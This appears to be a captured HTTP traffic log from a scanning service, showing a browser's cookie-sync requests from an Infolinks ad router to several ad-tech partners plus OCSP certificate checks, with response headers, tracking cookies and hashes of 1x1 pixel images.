--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            GET /server_match?r=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fimd-usync%3Fuser_id%3D%7BPUB_USER_ID%7D%26partner_id%3D1531 HTTP/1.1 
Host: ad.360yield.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         52.58.85.173
HTTP/2 302 Found
content-type: text/plain
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 0
location: https://ad.360yield.com/ul_cb/server_match?r=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fimd-usync%3Fuser_id%3D%7BPUB_USER_ID%7D%26partner_id%3D1531
set-cookie: tuuid=abb2698e-a029-45ef-aa79-d4d64a4a8f24; Expires=Wed, 28 Dec 2022 03:49:08 GMT; Domain=.360yield.com; Path=/; SameSite=None; Secure tuuid_lu=1664423348; Expires=Wed, 28 Dec 2022 03:49:08 GMT; Domain=.360yield.com; Path=/; SameSite=None; Secure
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-Firefox-Spdy: h2

                                        
                                            GET /getuid?redir=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Ftplift%3Fuid%3D%24UID HTTP/1.1 
Host: eb2.3lift.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         76.223.111.18
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 37
cache-control: no-cache, no-store, must-revalidate
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   37
Md5:    3eacd0132310ea44cad756b378a3bc07
Sha1:   e2216a7e9b73f5cb0279351c78ce61c33475cea7
Sha256: bb229a48bee31f5d54ca12dc9bd960c63a671f0d4be86a054c1d324a44499d96
                                        
                                            GET /ups/58237/sync?&gdpr=&gdpr_consent=&redir=true HTTP/1.1 
Host: pixel.advertising.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         3.66.143.217
HTTP/2 302 Found
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 0
location: https://ups.analytics.yahoo.com/ups/58237/sync?&gdpr=&gdpr_consent=&redir=true
strict-transport-security: max-age=31536000
p3p: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
X-Firefox-Spdy: h2

                                        
                                            GET /bounce?%2Fgetuid%3Fhttps%253A%252F%252Frouter.infolinks.com%252Fdyn%252Fapn-usync%253Fuser_id%253D%2524UID HTTP/1.1 
Host: ib.adnxs.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         37.252.172.249
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.21.3
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
X-XSS-Protection: 0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Location: https://router.infolinks.com/dyn/apn-usync?user_id=0
AN-X-Request-Uuid: 450a583b-63b7-4ea0-8f92-49ac6cb81eb8
X-Proxy-Origin: 91.90.42.154; 91.90.42.154; 534.bm-nginx-loadbalancer.mgmt.fra1.adnexus.net; adnxs.com

                                        
                                            GET /ul_cb/server_match?r=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fimd-usync%3Fuser_id%3D%7BPUB_USER_ID%7D%26partner_id%3D1531 HTTP/1.1 
Host: ad.360yield.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         52.58.85.173
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 43
access-control-allow-origin: *
p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   43
Md5:    df3e567d6f16d040326c7a0ea29a4f41
Sha1:   ea7df583983133b62712b5e73bffbcd45cc53736
Sha256: 548f2d6f4d0d820c6c5ffbeffcbd7f0e73193e2932eefe542accc84762deec87
                                        
                                            GET /bounce?%2Fgetuid%3Fhttps%3A%2F%2Fs.cpx.to%2Fca.png%3Fref%3Dhttp%25253A%25252F%25252Fedoses.blogspot.com%25252F2013%25252F01%25252Ffree-mortgage-loan-rates.html%26pid%3D12306%26adnxs_uid%3D%24UID HTTP/1.1 
Host: ib.adnxs.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         37.252.172.249
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Server: nginx/1.21.3
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs-simple.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
X-XSS-Protection: 0
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Location: https://s.cpx.to/ca.png?ref=http%3A%2F%2Fedoses.blogspot.com%2F2013%2F01%2Ffree-mortgage-loan-rates.html&pid=12306&adnxs_uid=0
AN-X-Request-Uuid: d9553cd1-cb45-4dc3-a258-6bda7e24727c
X-Proxy-Origin: 91.90.42.154; 91.90.42.154; 534.bm-nginx-loadbalancer.mgmt.fra1.adnexus.net; adnxs.com

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5776
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 02:12:52 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.godaddy.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 76
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         192.124.249.22
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Sucuri/Cloudproxy
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 1778
Connection: keep-alive
X-Sucuri-ID: 19022
Content-Transfer-Encoding: Binary
Cache-Control: public, no-transform, must-revalidate
Last-Modified: Wed, 28 Sep 2022 22:17:12 GMT
Expires: Thu, 29 Sep 2022 22:17:12 GMT
ETag: "804b9f7ba8aef1ac91c31d9b1681402c3c25471a"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"


--- Additional Info ---
Magic:  data
Size:   1778
Md5:    453ecef9c41afce992f6930af965b2be
Sha1:   804b9f7ba8aef1ac91c31d9b1681402c3c25471a
Sha256: 68a9dcd9642a44b8a36254b4d58be01b699f198edaf676ba5dcbc39b31c907a9
                                        
                                            POST / HTTP/1.1 
Host: ocsp.godaddy.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 76
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         192.124.249.22
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: Sucuri/Cloudproxy
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 1778
Connection: keep-alive
X-Sucuri-ID: 19022
Content-Transfer-Encoding: Binary
Cache-Control: public, no-transform, must-revalidate
Last-Modified: Thu, 29 Sep 2022 01:50:58 GMT
Expires: Fri, 30 Sep 2022 01:50:58 GMT
ETag: "bb3a4af7b90a603da7deeee96ca9eb3002dc2907"
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"


--- Additional Info ---
Magic:  data
Size:   1778
Md5:    8e8d986c459b2bde7b1e10fb52045da3
Sha1:   bb3a4af7b90a603da7deeee96ca9eb3002dc2907
Sha256: fcf1f00c02837d86d165888fdf1f85092f636c0670ddd1106d73a5be0c410b1b
                                        
                                            GET /dyn/qc-usync?&uid=Rt_eakHZj2td2I5qEd7Aa0SK3z5d2dk-RN5i_7Pn HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store, no-cache, private
set-cookie: QCUSERCOOKIE=Rt_eakHZj2td2I5qEd7Aa0SK3z5d2dk-RN5i_7Pn; Domain=infolinks.com; Expires=Wed, 28-Dec-2022 03:49:08 GMT; Path=/; SameSite=None; Secure
pragma: no-cache
expires: Wed, 29 Sep 2021 03:49:08 GMT
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf4719f9b4fd-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            GET /pixel?redir=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fsovrn-usync%3Fuid%3D%24UID HTTP/1.1 
Host: ap.lijit.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         72.251.249.13
HTTP/1.1 204 No Content
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, DELETE, PUT
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-Requested-With, Content-Type
X-Sovrn-Pod: ad_ap2ams1

                                        
                                            GET /usersync2/infolinks HTTP/1.1 
Host: sync.1rx.io
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         213.19.147.44
HTTP/2 302 Found
content-type: text/html
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
cache-control: no-store, no-cache, must-revalidate
expires: 0
pragma: no-cache
set-cookie: _rxuuid=%7B%22rx_uuid%22%3A%22RX-74b0cea1-46c3-4797-957c-88d5b23f8784-003%22%2C%22zdxidn%22%3A%222109%22%7D; path=/; expires=Fri, 29 Sep 2023 03:49:08 GMT; domain=.1rx.io; samesite=none; secure; httponly
p3p: CP="This is not a P3P policy! See https://www.rhythmone.com/p3p to learn why"
location: https://sync.1rx.io/usersync2/infolinks?zcc=1&cb=1664423348341
etag: RX74b0cea146c34797957c88d5b23f8784003
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            GET /usersync2/infolinks?zcc=1&cb=1664423348341 HTTP/1.1 
Host: sync.1rx.io
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         213.19.147.44
HTTP/2 302 Found
content-type: text/html
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
cache-control: no-store, no-cache, must-revalidate
expires: 0
pragma: no-cache
location: https://router.infolinks.com/dyn/r1-usync?uid=OPTOUT
etag: OPTOUT
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            GET /dyn/apn-usync?user_id=0 HTTP/1.1 
Host: router.infolinks.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.66.42.247
HTTP/2 200 OK
content-type: image/gif
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 35
cache-control: no-store
p3p: CP="NON DSP NID OUR COR"
via: 1.1 google
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 7521bf477a19b4fd-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 87a, 1 x 1\012- data
Size:   35
Md5:    c0a97b478925284bd94e3271f6197c08
Sha1:   543e1556715b858c654397c62c0894dd6f294703
Sha256: 16957a3bb9422d4ba380be3b630db7a310e87e65f224e2be865dd64dd0b5664d
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 02:15:47 GMT
Expires: Wed, 05 Oct 2022 02:15:46 GMT
Etag: "f860c7cf4a361250caa496ff32876773018d1447"
Cache-Control: max-age=512197,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb1
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf46ffaab518-OSL

                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 18:01:45 GMT
Expires: Wed, 05 Oct 2022 18:01:44 GMT
Etag: "e3fe33975d5d6e80667b44175ad9caa4f04f6cbb"
Cache-Control: max-age=568955,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb6
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf480b4eb4f1-OSL

                                        
                                            GET /us?loc=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fsonobi-usync%3Fuid%3D%5BUID%5D HTTP/1.1 
Host: sync.go.sonobi.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         69.166.1.12
HTTP/1.1 302 Found
Content-Type: text/plain; charset=utf8
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 0
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, no-store, private
P3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Tcn: Choice
Vary: negotiate,Accept-Encoding
X-Go-Server: go-iad-2-5-44
X-Xss-Protection: 0
Location: https://router.infolinks.com/dyn/sonobi-usync?uid=7f7a386f-6904-49d7-a590-5a4a27296d93
Server: sonobi-go
Set-Cookie: __uis=7f7a386f-6904-49d7-a590-5a4a27296d93; expires=Sat, 29 Oct 2022 03:49:08 GMT; domain=.go.sonobi.com; path=/; secure; SameSite=None HAPLB8S=s8544|YzUWo; path=/; domain=.go.sonobi.com; SameSite=None; secure

                                        
                                            GET /cm?pub=43153&in=1 HTTP/1.1 
Host: p.rfihub.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         193.0.160.129
HTTP/1.1 302 Found
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: eud=H4sIAAAAAAAA_1slzmtoZmZiYmRsbGJhamwBAGK4yIsQAAAA; Path=/; Domain=.rfihub.com; Expires=Tue, 24 Oct 2023 03:49:08 GMT; Secure; SameSite=None ruds=H4sIAAAAAAAA_-MSNjU0NjExNTUxtDQ2MjM1MTU3txDiM9QN8A3RdXUtzTAxqkgFAFhmmZslAAAA; Path=/; Domain=.rfihub.com; Secure; SameSite=None rud=H4sIAAAAAAAA_-MSNjU0NjExNTUxtDQ2MjM1MTU3txDiM9QN8A3RdXUtzTAxqkgFAFhmmZslAAAA; Path=/; Domain=.rfihub.com; Expires=Tue, 24 Oct 2023 03:49:08 GMT; Secure; SameSite=None
Location: https://router.infolinks.com/dyn/zeta-usync?uid=5134455419326545778
Content-Length: 0
Server: Jetty(9.3.29.v20201019)

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1029
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 03:31:59 GMT
Server: ECS (ska/F706)
X-Cache: HIT
Content-Length: 471

                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 1216
Cache-Control: 'max-age=158059'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Last-Modified: Thu, 29 Sep 2022 03:28:52 GMT
Server: ECS (ska/F6FD)
X-Cache: HIT
Content-Length: 471

                                        
                                            GET /ca.png?ref=http%3A%2F%2Fedoses.blogspot.com%2F2013%2F01%2Ffree-mortgage-loan-rates.html&pid=12306&adnxs_uid=0 HTTP/1.1 
Host: s.cpx.to
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         54.170.46.213
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Cache-Control: no-store, must-revalidate, private, max-age=0, no-store, must-revalidate, private, max-age=0
Content-Security-Policy: default-src 'self'
Date: Thu, 29 Sep 2022 03:49:08 GMT
Expires: Thu, 29 Sep 2022 03:49:08 UTC
P3P: CP="NOI DEV ADM"
Pragma: no-cache, no-cache
Set-Cookie: cpSess=5dc442bfcc382020; Expires=Fri, 29 Sep 2023 03:49:08 GMT; Domain=.cpx.to; Path=/; Secure; HttpOnly; SameSite=None
Strict-Transport-Security: max-age=31536000; includeSubDomains
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-Permitted-Cross-Domain-Policies: none
Content-Length: 95
Connection: keep-alive


--- Additional Info ---
Magic:  PNG image data, 1 x 1, 1-bit colormap, non-interlaced\012- data
Size:   95
Md5:    9606fa62df0ffe87253f3baf418f0e42
Sha1:   fe8520ab0bf1622350513d685ece5faf70b4e8c1
Sha256: bf27786b4381176350787d768bf5f7c5310ba640aa48ee98a3d2c310ddd971ab
                                        
                                            POST / HTTP/1.1 
Host: ocsp.sectigo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         
                                         172.64.155.188
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Thu, 29 Sep 2022 03:49:08 GMT
Content-Length: 471
Connection: keep-alive
Last-Modified: Wed, 28 Sep 2022 23:33:42 GMT
Expires: Wed, 05 Oct 2022 23:33:41 GMT
Etag: "bd57ff69a033029668678914bf0bf0db0b037949"
Cache-Control: max-age=588872,s-maxage=1800,public,no-transform,must-revalidate
X-CCACDN-Proxy-ID: mcdpinlb6
X-Frame-Options: SAMEORIGIN
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 7521bf477e03b4ee-OSL

                                        
                                            GET /usersync/infolinks/?cb=https%3A%2F%2Frouter.infolinks.com%2Fdyn%2Fzmn-usync%3Fuid%3D__ZUID__ HTTP/1.1 
Host: b1sync.zemanta.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         64.74.236.95
HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
                                        
Content-Length: 70
Cache-Control: no-cache, no-store, must-revalidate
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: https://router.infolinks.com/dyn/zmn-usync?uid=
Pragma: no-cache
Date: Thu, 29 Sep 2022 03:49:08 GMT


--- Additional Info ---
Magic:  HTML document, ASCII text
Size:   70
Md5:    16ccc9da763aca428789e4f469fc7ff1
Sha1:   4a873c523b8d9bdbc30b8c48189817413a19ee7a
Sha256: 5be7e833013b4b10333a904010b01217263df39c501a29b146d072110ceea4a1
                                        
                                            GET /ups/58422/occ HTTP/1.1 
Host: ups.analytics.yahoo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://router.infolinks.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         18.156.0.31
HTTP/2 302 Found
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
content-length: 0
strict-transport-security: max-age=31536000
p3p: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
location: https://ups.analytics.yahoo.com/ups/58422/occ?verify=true
age: 0
server: ATS/9.1.10.25
set-cookie: A3=d=AQABBLQVNWMCECjXNN2k4i8rb18tFo0zqQwFEgEBAQFnNmM-YwAAAAAA_eMAAA&S=AQAAAoqT9m4BvwUrBrzmRTV4o6M; Expires=Fri, 29 Sep 2023 09:49:08 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
X-Firefox-Spdy: h2

                                        
                                            GET /ups/58237/sync?&gdpr=&gdpr_consent=&redir=true&verify=true HTTP/1.1 
Host: ups.analytics.yahoo.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://router.infolinks.com/
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         18.156.0.31
HTTP/2 204 No Content
                                        
date: Thu, 29 Sep 2022 03:49:08 GMT
p3p: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
strict-transport-security: max-age=31536000
age: 0
server: ATS/9.1.10.25
